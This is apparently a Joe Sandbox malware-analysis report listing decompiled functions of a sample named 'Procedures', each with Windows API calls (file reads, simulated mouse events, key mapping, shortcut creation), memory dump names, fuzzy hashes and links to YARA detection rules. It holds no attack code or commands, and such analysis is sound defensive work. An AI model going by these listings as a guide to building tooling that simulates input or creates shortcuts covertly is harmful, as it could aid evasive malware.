                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0484a764ee5629da6825ac2d5676212c0b6f9831c202a9d9f72cedfd44e79117
                                                                                                                                                                                                                                                                                                    • Instruction ID: 74c542c1cb2913afae91d9fef034053d001b05c03a8382ecd1f0eb5d18aaf51f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0484a764ee5629da6825ac2d5676212c0b6f9831c202a9d9f72cedfd44e79117
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41D15971508211AFC304EF24D881E6BB7E8FF98708F40596DF585AB262DB71ED49CB92
                                                                                                                                                                                                                                                                                                    Function 00E91196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E911B3
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E911EE
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00E9120A
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00E91283
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E9129A
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E912C8
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 814de960cda83008887bbd28d8720f954191fa0f814abd68c7ea04d61098c96a
                                                                                                                                                                                                                                                                                                    • Instruction ID: c1d03e3f575122376a261d5201817e24870e93ca8f8a65fd360403902e179a9b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 814de960cda83008887bbd28d8720f954191fa0f814abd68c7ea04d61098c96a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4415C71901205EFDF05AF95EC85AAAB7B8FF04314F1440A5EE00AB2A6DB30DE55DBA0
                                                                                                                                                                                                                                                                                                    Function 00EB8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E7FBEF,00000000,?,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00EB8CA7
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00EB8CCD
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00EB8D2C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00EB8D40
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00EB8D66
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EB8D8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 67e418493bf0ab8f9e30e33ae76ce24d15fc2302b2130ab1fe45ed021df3c4e6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f7e34e5e4a39958d2f803bcaa5651e15d202979b738fcf7c9ed1da824b2259e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e418493bf0ab8f9e30e33ae76ce24d15fc2302b2130ab1fe45ed021df3c4e6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75419370601244AFDB25DF24CA95BE27FF9FB85308F1451A9E6087B3A2CB716849CF51
                                                                                                                                                                                                                                                                                                    Function 00EA2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00EA2D45
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9EF33: GetWindowRect.USER32(?,?), ref: 00E9EF4B
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EA2D6F
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EA2D76
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EA2DB2
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EA2DDE
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EA2E3C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 83c916512de1a01d13cd449efe57c93173167b4fd32446af56a1f74b36eb51ed
                                                                                                                                                                                                                                                                                                    • Instruction ID: a9ee0695d5b020fc227c8b95df9a95a80d4baf04f199fb5a13fcec4cb8426ac2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83c916512de1a01d13cd449efe57c93173167b4fd32446af56a1f74b36eb51ed
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B331B072509315AFC720DF189C45B9BB7A9FB89354F001A1EF589BB191DA30E9098BE2
                                                                                                                                                                                                                                                                                                    Function 00E855E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00E855F9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E85616
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E8564E
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8566C
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E85674
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00E8567E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 649b21725ec19f8ae1090c1ba745d17cefb3431041ace0925dc2f9f80d574176
                                                                                                                                                                                                                                                                                                    • Instruction ID: a46d38a42c1a1b3fa1c861912d6d3fb01e66296ead00709bfd31084ff14520f0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 649b21725ec19f8ae1090c1ba745d17cefb3431041ace0925dc2f9f80d574176
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021F273604600BBEB166B25AC49E7B7BE8DF44720F14507AF90DEA191FE61C841A760
                                                                                                                                                                                                                                                                                                    Function 00E96263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E962C0
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00E963DA
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00EC0CC4,00000000,00000001,00EC0B34,?), ref: 00E963F3
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00E96411
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e1cbfd14a966374af6561149fa973001517ccbbfc4145b3b8a0a987d8dc02c7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4cc76c9c3969231d5c91dd2c9c184ffda1ca04ecd686fe31037ec52146753b67
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e1cbfd14a966374af6561149fa973001517ccbbfc4145b3b8a0a987d8dc02c7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67D15271A083119FCB14DF24D580A2ABBE5FF88714F15995EF889AB361CB31EC45CB92
                                                                                                                                                                                                                                                                                                    Function 00E436F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00E436E9,00E43355), ref: 00E43700
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E4370E
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E43727
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E436E9,00E43355), ref: 00E43779
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e0f8f90e54d333cf923abdbc81b18c52dff4a9cb5dc71892a5ab77a6b1e05669
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1795193eb4640eaf04c38a98532b1e5d201fead09b53a575c9aa10201373bfe6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0f8f90e54d333cf923abdbc81b18c52dff4a9cb5dc71892a5ab77a6b1e05669
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 590147B664E3116EF62427B6BCCE6672AD5EB05779734232BF160742F2EF114E069140
                                                                                                                                                                                                                                                                                                    Function 00E530E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00E44D53,00000000,?,?,00E468E2,?,?,00000000), ref: 00E530EB
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5311E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53146
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00E53153
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00E5315F
                                                                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00E53165
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d36930de5b2b2b59bd2942ca6178715a86810be5a51202546b306dbeff0cd6fb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4b9fd147ff4690d91203055981aac1115a4039a21815f7e0d11878fe5bda42d2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d36930de5b2b2b59bd2942ca6178715a86810be5a51202546b306dbeff0cd6fb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F0F9366069002BC2212736AD06A5B22E59FC17B7F242D18FE14F21D2FE208E0E4161
                                                                                                                                                                                                                                                                                                    Function 00EB9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E21F87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21F96
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: BeginPath.GDI32(?), ref: 00E21FAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21FD6
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00EB94AA
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00EB94BE
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00EB94CC
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00EB94DC
                                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00EB94EC
                                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00EB94FC
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 46c91e1c74baaa18b15c7f4f0701313058d1f80b9875d6fa290c7e9273178e46
                                                                                                                                                                                                                                                                                                    • Instruction ID: f3ea53bccca5d216668741439d06d6a970fba0b232038e282181f623321007d4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46c91e1c74baaa18b15c7f4f0701313058d1f80b9875d6fa290c7e9273178e46
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD11097600410DBFEB129F91EC88EAB7F6DEF08364F048111BA196A161D7719E59DBA0
                                                                                                                                                                                                                                                                                                    Function 00E85B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00E85B7C
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E85B8D
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E85B94
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00E85B9C
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E85BB3
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E85BC5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 47500656aae20f3b2b70a8e61033ddbfa3c02089ab17d397978dd7760c2db935
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2b7d4dcc94d3781f12e3c79cc4cd287aa720403ac8a8ab8afe90989693c5d493
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47500656aae20f3b2b70a8e61033ddbfa3c02089ab17d397978dd7760c2db935
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09012175A04719BBEB15ABA69C49E4A7FA8EB44751F004165EA09B7280E6709C04CF90
                                                                                                                                                                                                                                                                                                    Function 00E2327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E232AF
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E232B7
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E232C2
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E232CD
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E232D5
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E232DD
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
